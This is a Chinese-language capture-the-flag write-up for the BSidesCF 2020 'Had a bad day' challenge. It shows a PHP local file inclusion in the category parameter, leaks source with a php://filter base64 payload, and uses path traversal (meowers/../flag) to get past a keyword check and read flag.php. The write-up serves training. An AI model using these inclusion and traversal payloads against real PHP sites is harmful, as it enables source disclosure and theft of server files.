Single

[BSidesCF 2020]Had a bad day1 min read

给了两个按钮,随便点一个url连接会变成:index.php?category=meowers这种形式。

很容易想到文件包含漏洞。尝试:

category=php://filter/read=convert.base64-encode/resource=index

默默说一下,这里把index.php换成index是因为后端给文件后拼接了“.php”

得到index.php的源码,我截取了重要的部分:

<?php
$file = $_GET['category'];

if(isset($file))
{
	if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
		include ($file . '.php');
	}
	else{
		echo "Sorry, we currently only support woofers and meowers.";
	}
}
?>

接下来包含flag.php文件:

?category=meowers/../flag

查看源代码,会多出这一行,说明已经成功包含到了:

<!-- Can you read this flag? -->

读取flag.php:

?category=php://filter/read=convert.base64-encode/resource=meowers/../flag